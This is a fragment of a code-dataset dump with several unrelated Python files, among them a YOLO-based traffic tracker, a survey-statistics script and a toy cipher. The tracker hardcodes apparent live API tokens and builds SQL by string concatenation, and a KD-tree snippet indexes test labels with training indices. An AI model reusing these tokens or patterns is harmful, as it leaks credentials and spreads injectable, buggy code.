__init__(self):\n\t\tsuper().__init__()\n\t\tself.name = \"console_retransler\"\n\t\tself.do_retrans()\n\t\tself.stop_token = False\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.pid = os.getpid()\n\t\t\tself.readFile = os.fdopen(self.r)\n\t\texcept Exception as ex:\n\t\t\tsys.stderr.write(\"console_retransler::rdopen error: \", ex, self.ipipe)\n\t\t\tsys.stderr.write(\"\\r\\n\")\n\t\t\tsys.stderr.flush()\n\t\t\texit(0)\n\t\t\n\t\twhile(True):\n\t\t\tif self.stop_token:\n\t\t\t\tif __RETRANSLER_TRACE__:\n\t\t\t\t\tprint_to_stderr(\"finish console retransler... ok\")\n\t\t\t\treturn\n\t\t\ttry:\n\t\t\t\tinputdata = self.readFile.readline()\n\t\t\texcept:\n\t\t\t\tif __RETRANSLER_TRACE__:\n\t\t\t\t\tprint_to_stderr(\"finish console retransler... except\")\n\t\t\t\treturn\n\t\t\t\n\t\t\tzencad.gui.application.MAIN_COMMUNICATOR.send({\"cmd\":\"console\",\"data\":inputdata})\n\n\tdef finish(self):\n\t\tif __RETRANSLER_TRACE__:\n\t\t\tprint_to_stderr(\"finish console retransler... started\")\n\t\t\t\n\t\t#os.kill(self.pid, signal.SIGKILL)\n\t\tself.stop_token = True\n\n\n\t\t# TODO: CHANGE FINISH MODEL\n\n\t\t#try:\n\t\t#\tos.close(self.readFile.fileno())\n\t\t#except:\n\t\t#\tpass\n#\n\t\t#if __RETRANSLER_TRACE__:\n\t\t#\tprint_to_stderr(\"L\")\n\t\t#try:\n\t\t#\t#\tprint_to_stderr(\"B\")\n\t\t#\t#time.sleep(0.05)\n\t\t#\tzencad.gui.signal_os.kill(self.pid, zencad.gui.signal_os.sigkill)\n\t\t#except Exception as ex:\n\t\t#\tprint_to_stderr(\"console_retransler on kill\", ex)\n#\n\t\t#if __RETRANSLER_TRACE__:\n\t\t#\tprint_to_stderr(\"finish console retransler... exit\")\n\n\n\t\t#gone, alive = psutil.wait_procs(procs, timeout=3, callback=on_terminate)\n\t\t#for p in alive:\n\t\t# p.kill()\n\n\tdef do_retrans(self, old=1, new=3):\n\t\tif __RETRANSLER_TRACE__:\n\t\t\tprint_to_stderr(\"do_retrans old:{} new:{}\".format(old, new))\n\n\t\tos.dup2(old, new)\n\t\tr, w = os.pipe()\n\t\tself.r = r\n\t\tself.w = w\n\t\tself.old = old\n\t\tself.new = new\n\t\tos.close(old)\n\t\tos.dup2(w, old)\n\n\t\tsys.stdout = os.fdopen(old, \"w\", 1)\n","sub_path":"zencad/gui/retransler.py","file_name":"retransler.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"65677743","text":"from .core import Primitive\n\nclass Flag(Primitive):\n\n def __init__(self, value=False):\n Primitive.__init__(self)\n self._Value = value\n\n def set(self, value=True):\n self._Value = value\n self.wakeup()\n\n def get(self):\n return self._Value\n\n value = property(get, set)\n\n def sleep_until(self, value=None, predicate=None, timeout = None):\n if value is not None:\n predicate = lambda x, v=value: x == v\n if predicate is None:\n predicate = lambda x: bool(x) # default: wait until the value evaluates to True\n while True:\n with self:\n if predicate(self._Value):\n break\n else:\n self.sleep(timeout)\n","sub_path":"pythreader/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"125858632","text":"#!/usr/bin/env python\n#\n# Copyright 2013 Simone Campagna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n__author__ = 'Simone Campagna'\n\nimport inspect\n\nfrom .field import *\n\nclass FieldType(object):\n def __init__(self, field_name, field_type, description=\"\", default=None):\n self.field_name = field_name\n assert issubclass(field_type, Field), \"invalid field type {}\".format(type(field_type))\n self.field_type = field_type\n self.attr_name = self.field_type.create_attr_name(self.field_name)\n if description is None:\n description = \"\"\n self.field_description = description\n self.field_default = default\n self.frame, self.filename, self.line_number, self.function_name, self.lines, self.index=\\\n inspect.getouterframes(inspect.currentframe())[1]\n\n def create(self):\n if self.field_default is None:\n instance = self.field_type()\n else:\n instance = self.field_type(self.field_default)\n if self.field_description:\n instance.set_description(self.field_description)\n return instance\n\n def __str__(self):\n l = [repr(self.field_name)]\n l.append('field_type={0!r}'.format(self.field_type.__name__))\n for attr_name in ('field_default', ):\n attr = getattr(self, attr_name)\n if attr is not None:\n l.append('{0}={1!r}'.format(attr_name, attr))\n return \"{0}({1})\".format(self.__class__.__name__, ', '.join(l))\n\nclass MetaStruct(abc.ABCMeta):\n def __new__(cls, class_name, class_bases, class_dict):\n t = super(MetaStruct, cls).__new__(cls, class_name, class_bases, class_dict)\n for field in t.__fields__:\n setattr(t, field.field_name, field.field_type.create_property(field.field_name, field.attr_name))\n return t\n\nclass Struct(Field):\n __metaclass__ = MetaStruct\n __fields__ = ()\n def __init__(self):\n super(Struct, self).__init__()\n for field_type in self.__fields__:\n try:\n field = field_type.create()\n except Exception as e:\n raise ValueError(\"Struct {sc}: file {f}, line={ln}: invalid field type {ft}: {ec}: {e}\".format(\\\n sc=self.__class__.__name__,\n ft=field_type,\n f=field_type.filename,\n ln=field_type.line_number,\n ec=e.__class__.__name__,\n e=e))\n setattr(self, field_type.attr_name, field)\n for field_type in self.__fields__:\n field = getattr(self, field_type.attr_name)\n field.set_parent(self, field_type.field_name)\n\n def set_parent(self, parent, name):\n super(Struct, self).set_parent(parent, name)\n\n def get_item_name_prefix(self, parent):\n return parent.get_name()\n\n def get_name_separator(self):\n return \".\"\n\n def set(self, value):\n if isinstance(value, self.__class__):\n for field in self.__fields__:\n setattr(self, field.attr_name, getattr(value, field.attr_name))\n else:\n super(Struct, self).set(value)\n\n @classmethod\n def check(cls, value):\n return isinstance(value, cls)\n\n def __str__(self):\n return \"{0}({1})\".format(self.__class__.__name__, ', '.join(\"{0}={1!r}\".format(field.field_name, getattr(self, field.field_name)) for field in self.__fields__))\n __repr__ = __str__\n\n def accept(self, visitor):\n super(Struct, self).accept(visitor)\n for field in self.__fields__:\n getattr(self, field.attr_name).accept(visitor)\n\n def tostream(self, stream):\n for field in self.__fields__:\n getattr(self, field.attr_name).tostream(stream)\n\n def frominput(self, istream, caller_trace=None, name=None):\n caller_trace = CallerTrace(caller_trace, CallerInfo(self, name))\n for field in self.__fields__:\n getattr(self, field.attr_name).frominput(istream, caller_trace, field.field_name)\n\n def __eq__(self, other):\n self.check_comparable(other)\n for field in self.__fields__:\n attr_name = field.attr_name\n if getattr(self, attr_name) != getattr(other, attr_name):\n return False\n else:\n return True\n\n def dumptable(self, table, indentation_level=0, depth=-1):\n super(Struct, self).dumptable(table, indentation_level, depth)\n for field in self.__fields__:\n field_name = field.field_name\n attr_name = field.attr_name\n getattr(self, attr_name).dumptable(table, indentation_level + 1, depth)\n\n @classmethod\n def dumpclasstable(cls, table, name=None, indentation_level=0, description=\"\", depth=-1):\n super(Struct, cls).dumpclasstable(table, name, indentation_level, description, depth)\n for field in cls.__fields__:\n field_type = field.field_type\n field_name = field.field_name\n field_description = field.field_description\n field_type.dumpclasstable(table, cls._dumpcomposename(name, field_name), indentation_level + 1, field_description, depth)\n","sub_path":"structparser/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"76898468","text":"# To do survey analysis in Python we need to use a non-standard branch\n# from github.\nimport sys\nsys.path.insert(0, \"/afs/umich.edu/user/k/s/kshedden/jarvis/statsmodels\")\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nimport patsy\nfrom read_meps import meps\n\nages = pd.cut(meps.AGE14X, np.arange(0, 90, 5))\n\n# Total office-visit expenses in billions, by age/sex category\ndi = sm.survey.SurveyDesign(strata=meps.VARSTR, cluster=meps.VARPSU,\n weights=meps.PERWT14F, nest=True)\nsj, se = [], []\nfor sex in 1,2:\n for age in ages.cat.categories:\n x = ((meps.SEX == sex) & (ages == age)) * meps.OBDEXP14\n svm = sm.survey.SurveyTotal(di, x)\n sj.append([sex, age, svm.est[0]])\n se.append([sex, age, svm.stderr[0]])\nsj = pd.DataFrame(sj)\nsj.columns = [\"Sex\", \"Age\", \"Prop\"]\nsj = sj.pivot(index=\"Age\", columns=\"Sex\", values=\"Prop\")\nsj /= 1e9\nse = pd.DataFrame(se)\nse.columns = [\"Sex\", \"Age\", \"SE\"]\nse = se.pivot(index=\"Age\", columns=\"Sex\", values=\"SE\")\nse /= 1e9\nprint(sj.to_string(float_format=\"%.2f\"))\nprint(se.to_string(float_format=\"%.2f\"))\n\n# Total office-visit expenses in billions, by age/sex category, using\n# fake clusters to illustrate the impact of clustering on the standard\n# errors.\ndi = sm.survey.SurveyDesign(strata=meps.VARSTR, cluster=np.random.choice(100, meps.shape[0]),\n weights=meps.PERWT14F, nest=True)\nsj2, se2 = [], []\nfor sex in 1,2:\n for age in ages.cat.categories:\n x = ((meps.SEX == sex) & (ages == age)) * meps.OBDEXP14\n svm = sm.survey.SurveyTotal(di, x)\n sj2.append([sex, age, svm.est[0]])\n se2.append([sex, age, svm.stderr[0]])\nsj2 = pd.DataFrame(sj2)\nsj2.columns = [\"Sex\", \"Age\", \"Prop\"]\nsj2 = sj2.pivot(index=\"Age\", columns=\"Sex\", values=\"Prop\")\nsj2 /= 1e9\nse2 = pd.DataFrame(se2)\nse2.columns = [\"Sex\", \"Age\", \"SE\"]\nse2 = se2.pivot(index=\"Age\", columns=\"Sex\", values=\"SE\")\nse2 /= 1e9\nprint(sj2.to_string(float_format=\"%.2f\"))\nprint(se2.to_string(float_format=\"%.2f\"))\n\n\nmeps[\"agecats\"] = ages\nmx = meps[[\"INSCOV14\", \"SEX\", \"agecats\", \"PERWT14F\", \"VARPSU\", \"VARSTR\"]].dropna()\ndi = sm.survey.SurveyDesign(strata=mx.VARSTR, cluster=mx.VARPSU,\n weights=mx.PERWT14F, nest=True)\ny,x = patsy.dmatrices(\"INSCOV14 ~ SEX + agecats\", data=mx)\ny = 1*(y == 3)\nmodel = sm.survey.SurveyModel(di, sm.GLM, init_args={\"family\": sm.families.Binomial()})\nresult = model.fit(y, x, cov_method=\"jackknife\")\nrslt = pd.DataFrame({\"Names\": x.design_info.column_names, \"Params\": model.params,\n \"SE\": model.stderr})\n","sub_path":"MEPS/meps_survey.py","file_name":"meps_survey.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207439692","text":"import sys\nimport cv2\nimport numpy as np\nfrom tracking import *\nfrom yolo import YOLO\nimport copy\nimport random\nimport sqlite3\nimport requests\nfrom datetime import datetime\n\nvideoFileName = \"detect\"\nVIDEO_DIR = \"./videos/\" + videoFileName + \".mp4\"\n\ntemp_min = 0\ntemp_max = 0\nweather_main = 0\nlat = 0.0\nlng = 0.0\nvideo_len = 0\n\n\ndef letterbox_image(image, size):\n \"\"\"resize image with unchanged aspect ratio using padding\"\"\"\n ih, iw = image.shape[:2]\n h, w = size\n scale = min(w / iw, h / ih)\n nw = int(iw * scale)\n nh = int(ih * scale)\n\n # print(\"************************* scale *******************\")\n # print(ih,iw,nh,nw,scale)\n\n image = cv2.resize(image, (nw, nh), cv2.INTER_CUBIC)\n new_image = np.zeros((w, h, 3), np.uint8)\n new_image[:, :] = (128, 128, 128)\n new_image[\n (h - nh) // 2 : (h - nh) // 2 + nh, (w - nw) // 2 : (w - nw) // 2 + nw\n ] = image\n return new_image, scale\n\n\nselection_dict = {\"img\": None, \"points selected\": []}\n\n\ndef select_point(event, x, y, flags, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.circle(selection_dict[\"img\"], (x, y), 5, (0, 255, 0), -1)\n selection_dict[\"points selected\"].append([x, y])\n\n\ndef select_quadrilateral_from(image):\n selection_dict[\"img\"] = image\n cv2.namedWindow(\"selection frame\")\n cv2.setMouseCallback(\"selection frame\", select_point)\n\n while 1:\n cv2.imshow(\"selection frame\", image)\n if cv2.waitKey(20) & 0xFF == 27:\n break\n if len(selection_dict[\"points selected\"]) >= 4:\n break\n\n cv2.destroyAllWindows()\n if len(selection_dict[\"points selected\"]) != 4:\n return -1\n\n selection_dict[\"points selected\"].sort(key=lambda point: point[1])\n\n \"\"\"\n After sorting with y coordinate as key, the first two points represent the top two \n points of the quadrilateral, and the next two represent the bottom two.\n \"\"\"\n\n if (\n selection_dict[\"points selected\"][0][0]\n > selection_dict[\"points selected\"][1][0]\n ):\n selection_dict[\"points selected\"][0], selection_dict[\"points selected\"][1] = (\n selection_dict[\"points selected\"][1],\n selection_dict[\"points selected\"][0],\n )\n\n if (\n selection_dict[\"points selected\"][3][0]\n > selection_dict[\"points selected\"][2][0]\n ):\n selection_dict[\"points selected\"][3], selection_dict[\"points selected\"][2] = (\n selection_dict[\"points selected\"][2],\n selection_dict[\"points selected\"][3],\n )\n\n selection_dict[\"points selected\"] = np.array(\n selection_dict[\"points selected\"], dtype=np.int32\n )\n return 1\n\n\ndef getVehicleColor(img):\n # get image height and width\n h, w = img.shape[:2]\n pix = img[int(h / 2), int(w / 2)]\n\n # Create and initialize a dictionary of colors to 0\n colorTags = {\n \"whitish\": 0,\n \"grayish\": 0,\n \"black\": 0,\n \"blueish\": 0,\n \"greenish\": 0,\n \"reddish\": 0,\n \"yellowish\": 0,\n \"cyanish\": 0,\n \"purplish\": 0,\n \"other\": 0,\n }\n\n # Initialise pointer starting at 20% height and width\n # Because the main object is located at the center\n baseH = int(h * 0.2)\n baseW = int(w * 0.2)\n\n # Iterate through 40% of pixels around centroid\n for i in range(int(h * 0.4)):\n for j in range(int(w * 0.4)):\n # Increment the count of pixel color\n colorTags[getColor(img[baseH + i, baseW + j])] = (\n colorTags[getColor(img[baseH + i, baseW + j])] + 1\n )\n\n # Sort the dictionary in descending order of the number of times the color was deteced\n sortedList = sorted(colorTags.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)\n\n # Append the top 2 probable colors from the dictionary into colorList\n colorList = []\n for i in range(10):\n if len(colorList) >= 2:\n break\n if not sortedList[i][0] is \"other\":\n colorList.append(sortedList[i][0])\n\n # Return the predicted colors\n return colorList\n\n\ndef getColor(c):\n # Typecast each color(b,g,r) to int\n c = [int(c[0]), int(c[1]), int(c[2])]\n if (\n abs(c[0] - c[1]) < 25\n and abs(c[1] - c[2]) < 25\n and abs(c[0] - c[2]) < 25\n and (sum(c) / 3) > 200\n ):\n return \"whitish\"\n elif (\n abs(c[0] - c[1]) < 25\n and abs(c[1] - c[2]) < 25\n and abs(c[0] - c[2]) < 25\n and (sum(c) / 3) > 100\n ):\n return \"grayish\"\n elif (\n abs(c[0] - c[1]) < 5\n and abs(c[1] - c[2]) < 5\n and abs(c[0] - c[2]) < 5\n and (sum(c) / 3) < 100\n ):\n return \"black\"\n\n elif c[0] - c[1] > 25 and c[0] - c[2] > 25:\n return \"blueish\"\n elif c[1] - c[0] > 25 and c[1] - c[2] > 25:\n return \"greenish\"\n elif c[2] - c[1] > 25 and c[2] - c[0] > 25:\n return \"reddish\"\n\n # b g g r b r\n elif abs(c[0] - c[1]) > 25 and abs(c[1] - c[2]) < 25 and abs(c[0] - c[2]) > 25:\n return \"yellowish\"\n elif abs(c[0] - c[1]) < 25 and abs(c[1] - c[2]) > 25 and abs(c[0] - c[2]) > 25:\n return \"cyanish\"\n elif abs(c[0] - c[1]) > 25 and abs(c[1] - c[2]) > 25 and abs(c[0] - c[2]) < 25:\n return \"purplish\"\n\n return \"other\"\n\n\nif __name__ == \"__main__\":\n model_image_size = (608, 608)\n yolo = YOLO()\n\n conn = sqlite3.connect(\"traffic.db\")\n\n print(sys.argv)\n URL = \"http://api.openweathermap.org/data/2.5/weather?APPID=0bced365c4985a0af032b2cc537605cf\"\n PARAMS = {\"lat\": sys.argv[1], \"lon\": sys.argv[2]}\n r = requests.get(url=URL, params=PARAMS)\n weather_data = r.json()\n\n temp_max = weather_data[\"main\"][\"temp_max\"]\n temp_min = weather_data[\"main\"][\"temp_min\"]\n lat = float(sys.argv[1])\n lng = float(sys.argv[2])\n video_len = int(sys.argv[3])\n timestamp = sys.argv[4]\n datestamp = sys.argv[5]\n\n print(\"\\n\\n\\n\")\n dist_box = float(input(\"Distance of bounding box\"))\n print(\"\\n\\n\\n\")\n\n if weather_data[\"weather\"][0][\"main\"] == \"Haze\":\n weather_main = 0\n elif weather_data[\"weather\"][0][\"main\"] == \"Clouds\":\n weather_main = 1\n elif weather_data[\"weather\"][0][\"main\"] == \"Clear\":\n weather_main = 2\n elif weather_data[\"weather\"][0][\"main\"] == \"Rain\":\n weather_main = 3\n elif weather_data[\"weather\"][0][\"main\"] == \"Extreme\":\n weather_main = 4\n\n vehicle_count = 0\n frameNum = 0\n vehicle_saved = []\n vehicles = []\n cap = cv2.VideoCapture(VIDEO_DIR)\n ret, image = cap.read()\n image, scale = letterbox_image(image, tuple(reversed(model_image_size)))\n\n if select_quadrilateral_from(image) == -1:\n print(\"You must select 4 points\")\n cap.release()\n yolo.session_close()\n exit(0)\n\n quad_as_contour = selection_dict[\"points selected\"].reshape((-1, 1, 2))\n\n while True:\n frameNum += 1\n timePassed = frameNum / 30.0\n start = time.time()\n ret, image = cap.read()\n if image is None:\n break\n original_image = copy.copy(image)\n image, scale = letterbox_image(image, tuple(reversed(model_image_size)))\n boxes, objs = yolo.detect_image(image)\n # print(objs[\"label\"])\n \"\"\"\n Here we need to track\n \"\"\"\n selected_boxes = []\n for box in boxes:\n y_mid = (box[0] + box[1]) // 2\n x_mid = (box[2] + box[3]) // 2\n if (\n cv2.pointPolygonTest(\n selection_dict[\"points selected\"], (x_mid, y_mid), measureDist=False\n )\n >= 0\n ):\n selected_boxes.append(box)\n\n new_vehicles = not_tracked(\n selected_boxes, vehicles, vehicle_count, videoFileName, frameNum\n )\n vehicle_velocity_sum, deleted_count = update_or_deregister(\n selected_boxes, vehicles, dist_box, conn, frameNum\n )\n\n vehicle_count += len(new_vehicles)\n vehicles += new_vehicles\n\n for vehicle in vehicles:\n curH, curW = original_image.shape[:2]\n\n if (\n int(vehicle.top // scale) - 20 > 0\n and int(vehicle.bottom // scale) + 20 < curH\n and int(vehicle.top // scale) - 20 > 0\n and int(vehicle.right // scale) + 20 < curW\n ):\n crop_img = original_image[\n int(vehicle.top // scale) - 20 : int(vehicle.bottom // scale) + 20,\n int(vehicle.left // scale) - 20 : int(vehicle.right // scale) + 20,\n ]\n else:\n crop_img = original_image[\n int(vehicle.top // scale) : int(vehicle.bottom // scale),\n int(vehicle.left // scale) : int(vehicle.right // scale),\n ]\n\n try:\n cv2.imshow(\"cropped\", crop_img)\n except:\n pass\n filename = \"static/\" + videoFileName + \"-\" + str(vehicle.id) + \".jpg\"\n\n try:\n colorLst = getVehicleColor(crop_img)\n except:\n pass\n\n try:\n # add to img data set\n conn.execute(\n \"\"\"CREATE TABLE vehiclesLog\n (ID varchar PRIMARY KEY,\n lat REAL NOT NULL,\n lng REAL NOT NULL,\n speed real,\n object varchar,\n url varchar,\n color1 varchar,\n color2 varchar,\n number_plate varchar,\n timestamp time,\n datestamp date);\"\"\"\n )\n except:\n a = 1\n\n try:\n conn.execute(\n \"INSERT INTO vehiclesLog (ID, lat, lng, object, url, color1, color2, number_plate, timestamp, datestamp) VALUES ( '\"\n + str(videoFileName)\n + \"-\"\n + str(vehicle.id)\n + \"', \"\n + str(lat)\n + \", \"\n + str(lng)\n + \", '\"\n + str(vehicle.label)\n + \"', '\"\n + str(filename)\n + \"', '\"\n + str(colorLst[0])\n + \"', '\"\n + str(colorLst[1])\n + \"', '\"\n + str(\"number\")\n + \"', '\"\n + str(timestamp)\n + \"', '\"\n + str(datestamp)\n + \"');\"\n )\n conn.commit()\n except:\n a = 1\n\n try:\n img = cv2.imread(filename)\n # if 1 - abs(img.shape[1] / img.shape[0]) > 1 - abs(crop_img.shape[1] / crop_img.shape[0]):\n if (\n img.shape[1] < crop_img.shape[1]\n and img.shape[0] < crop_img.shape[0]\n ):\n cv2.imwrite(filename, crop_img)\n except:\n cv2.imwrite(filename, crop_img)\n\n # cv2.rectangle(original_image, (int(vehicle.left//scale), int(vehicle.top//scale)), (int(vehicle.right//scale), int(vehicle.bottom//scale)), (255, 0, 0), 2)\n # cv2.putText(original_image, str(vehicle.label), ((int(vehicle.left//scale)) -1 , (int(vehicle.top//scale)) - 5),\n # cv2.FONT_HERSHEY_SIMPLEX , fontScale=0.75, color=(255, 255, 0),\n # thickness=2)\n # cv2.putText(original_image, str(vehicle.id), ((int(vehicle.left//scale)+int(vehicle.right//scale))//2 -1 , (int(vehicle.top//scale)+int(vehicle.bottom//scale))//2 + 1),\n # cv2.FONT_HERSHEY_DUPLEX, fontScale=0.5, color=(255, 255, 0),\n # thickness=1)\n cv2.rectangle(\n image,\n (vehicle.left, vehicle.top),\n (vehicle.right, vehicle.bottom),\n (255, 0, 0),\n 2,\n )\n # cv2.putText(\n # image,\n # str(vehicle.label),\n # ((vehicle.left) - 1, (vehicle.top) - 5),\n # cv2.FONT_HERSHEY_DUPLEX,\n # fontScale=0.5,\n # color=(255, 255, 0),\n # thickness=1,\n # )\n cv2.putText(\n image,\n str(vehicle.id),\n (\n (vehicle.left + vehicle.right) // 2 - 1,\n (vehicle.top + vehicle.bottom) // 2 + 1,\n ),\n cv2.FONT_HERSHEY_DUPLEX,\n fontScale=0.5,\n color=(255, 255, 0),\n thickness=1,\n )\n end = time.time()\n cv2.putText(\n image,\n \"FPS: \" + str(int(1 / (end - start))),\n (0, 20),\n cv2.FONT_HERSHEY_COMPLEX,\n 0.5,\n (255, 255, 255),\n 1,\n )\n cv2.putText(\n image,\n \"Count: \" + str(vehicle_count),\n (608 // 2 - 20, 20),\n cv2.FONT_HERSHEY_COMPLEX,\n 0.5,\n (255, 255, 255),\n 1,\n )\n cv2.polylines(image, [quad_as_contour], True, (0, 255, 0), thickness=2)\n cv2.imshow(\"frame\", image)\n\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n cap.release()\n yolo.session_close()\n\n traffic_rate = vehicle_count / video_len\n ambulance_rate = 0\n hour = int(datetime.now().strftime(\"%H\"))\n month = int(datetime.now().strftime(\"%m\"))\n\n # done processing\n try:\n conn.execute(\n \"\"\"CREATE TABLE data_new\n (ID integer PRIMARY KEY AUTOINCREMENT,\n lat REAL NOT NULL,\n lng REAL NOT NULL,\n traffic_rate REAL NOT NULL,\n ambulance_rate REAL NOT NULL,\n weather integer,\n hour integer,\n month integer,\n temp_min REAL,\n temp_max REAL);\"\"\"\n )\n except:\n a = 1\n\n conn.execute(\n \"INSERT INTO data_new (lat,lng,traffic_rate,ambulance_rate,weather,temp_min,temp_max,hour,month) \\\n VALUES ( \"\n + str(lat)\n + \", \"\n + str(lng)\n + \", \"\n + str(traffic_rate)\n + \", \"\n + str(ambulance_rate)\n + \", \"\n + str(weather_main)\n + \", \"\n + str(temp_min)\n + \", \"\n + str(temp_max)\n + \", \"\n + str(hour)\n + \", \"\n + str(month)\n + \" )\"\n )\n conn.commit()\n print(\"Records added successfully to database\")\n conn.close()\n\n # ********************************************************** detect number plate **********************************************************\n conn = sqlite3.connect(\"traffic.db\")\n cursor = conn.execute(\"SELECT ID, url from vehiclesLog WHERE number_plate='number'\")\n for row in cursor:\n id = str(row[0])\n filename = \"./\" + str(row[1])\n print(id)\n\n with open(filename, \"rb\") as fp:\n response = requests.post(\n \"https://api.platerecognizer.com/v1/plate-reader/\",\n files=dict(upload=fp),\n headers={\n \"Authorization\": \"Token b74bffe69366f851e3a88dbb28d285900cfeeb57\"\n },\n )\n print(response.json())\n try:\n print(\"#\")\n numPlate = response.json()[\"results\"][0][\"plate\"]\n print(\"Plate number: \")\n print(str(numPlate).upper())\n print(\"\\n\")\n conn.execute(\n \"UPDATE vehiclesLog set number_plate = '\"\n + str(numPlate)\n + \"' WHERE ID = '\"\n + id\n + \"'\"\n )\n conn.commit()\n except:\n print(\"err\")\n pass\n print(\"Operation done successfully\")\n conn.close()\n","sub_path":"yolo_video.py","file_name":"yolo_video.py","file_ext":"py","file_size_in_byte":16192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519740388","text":"import sys\n\nclass PermCypher:\n def __init__(self):\n self.mode = sys.argv[1]\n self.key = sys.argv[2]\n self.key = [int(i) for i in self.key]\n self.inputFileName = sys.argv[3]\n self.outputFileName = sys.argv[4]\n\n def importData(self):\n with open(self.inputFileName) as file:\n data = file.read()\n return data\n\n def exportData(self, data):\n with open(self.outputFileName, 'w') as file:\n file.write(data)\n \n def encrypt(self, data):\n data = \"\".join(data.split(\" \"))\n out = \"\"\n for _ in range(0, len(data)%len(self.key)*-1%len(self.key)):\n data += \"X\"\n for offset in range(0, len(data), len(self.key)):\n for e in [a-1 for a in self.key]:\n out += data[offset+e]\n out += \" \"\n return out[:-1].replace(\" \",\"\")\n\n def inverse_key(self):\n inverse = []\n for position in range(min(self.key),max(self.key)+1,1):\n inverse.append(self.key.index(position)+1)\n print('inversed_key: '+str(inverse))\n return inverse\n\n def decrypt(self, data):\n self.key = self.inverse_key()\n return self.encrypt(data).replace(\" \",\"\")\n \n def translate(self):\n data = self.importData()\n if self.mode == '-d':\n self.exportData(self.decrypt(data))\n elif self.mode == '-e':\n self.exportData(self.encrypt(data))\n\n\n\ndef main():\n pc = PermCypher()\n pc.translate()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"data_protection/historical_cyphers/permutation_cypher.py","file_name":"permutation_cypher.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"424098142","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 31 22:59:21 2019\n\n@author: suraj\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.random import seed\nseed(123)\nfrom sklearn.neighbors import KDTree\nfrom sklearn.datasets import make_spd_matrix\n\nplt.rcParams.update({'font.size': 12})\n\n#%%\ndef mask_results(xtrain, ytrain, xtest, ytest, ypred):\n train_c0 = xtrain[ytrain[:,0]==0]\n train_c1 = xtrain[ytrain[:,0]==1]\n test_c0 = xtest[(ytest[:,0]==0) & (ypred[:,0]==0)]\n test_c1 = xtest[(ytest[:,0]==1) & (ypred[:,0]==1)]\n test_ic0 = xtest[(ytest[:,0]==0) & (ypred[:,0]==1)]\n test_ic1 = xtest[(ytest[:,0]==1) & (ypred[:,0]==0)]\n \n return train_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1 \n\n#%%\ndef plot_results(train_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1,name):\n fig, ax = plt.subplots(figsize=(10,8))\n \n ax.scatter(train_c0[:,0],train_c0[:,1],marker='x',color='r',label='Training: class 0')\n ax.scatter(train_c1[:,0],train_c1[:,1],marker='x',color='b',label='Training: class 1')\n \n ax.scatter(test_c0[:,0],test_c0[:,1],marker='x',color='g',label='Correctly classified class 0')\n plt.scatter(test_c1[:,0],test_c1[:,1],marker='x',color='m',label='Correctly classified class 1')\n \n ax.scatter(test_ic0[:,0],test_ic0[:,1],marker='D',color='k',label='Incorrectly classified class 0')\n ax.scatter(test_ic1[:,0],test_ic1[:,1],marker='D',color='darkorange',label='Incorrectly classified class 1')\n \n ax.set_xlabel(r'$x_1$',fontsize=18)\n ax.set_ylabel(r'$x_2$',fontsize=18)\n ax.legend()\n plt.show()\n fig.savefig(name)\n \n#%%\nn1 = 5000\nn2 = 5000\nsplit = 0.5\n\nmean1 = np.random.randn(1,2).flatten()\ncov1 = make_spd_matrix(2,2)\ndata1 = np.random.multivariate_normal(mean1, cov1, n1)\nlabel1 = np.zeros((n1,1))\n\nmean2 = np.random.randn(1,2).flatten()\ncov2 = make_spd_matrix(2,2)\ndata2 = np.random.multivariate_normal(mean2, cov2, n2)\nlabel2 = np.ones((n2,1))\n\ndata = np.vstack((data1,data2))\nlabels = np.vstack((label1,label2))\n\n#%%\nindices = np.full(data.shape[0],True)\nindices[:int(data.shape[0]*split)] = False\nnp.random.shuffle(indices)\n\nxtrain, ytrain = data[indices==True], labels[indices==True]\nxtest, ytest = data[indices==False], labels[indices==False]\n\n#%%\ndef linear_classifier(xtrain, ytrain):\n xtxi = np.linalg.inv(np.dot(xtrain.T, xtrain))\n beta = np.dot(np.dot(xtxi,xtrain.T),ytrain)\n \n return beta\n\nbeta = linear_classifier(xtrain, ytrain)\n\nypred = np.zeros((ytest.shape))\nypred = np.dot(xtest,beta)\n\n#%%\nypred = np.array(ypred > 0.5, dtype=int)\n\ntrain_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1 = mask_results(xtrain, ytrain, xtest, ytest, ypred)\n\nlin_accuracy = (test_c0.shape[0] + test_c1.shape[0])/(ytest.shape[0])\n\nplot_results(train_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1,'linear_classifier.pdf')\n\n#%%\ntree = KDTree(xtrain, leaf_size=2)\n\nnearest_dist, nearest_ind = tree.query(xtest, k=1)\nypred_kdtree = ytest[nearest_ind[:,0]]\n\ntrain_c0_kdt, train_c1_kdt, test_c0_kdt, test_c1_kdt, test_ic0_kdt, test_ic1_kdt = mask_results(xtrain, \n ytrain, \n 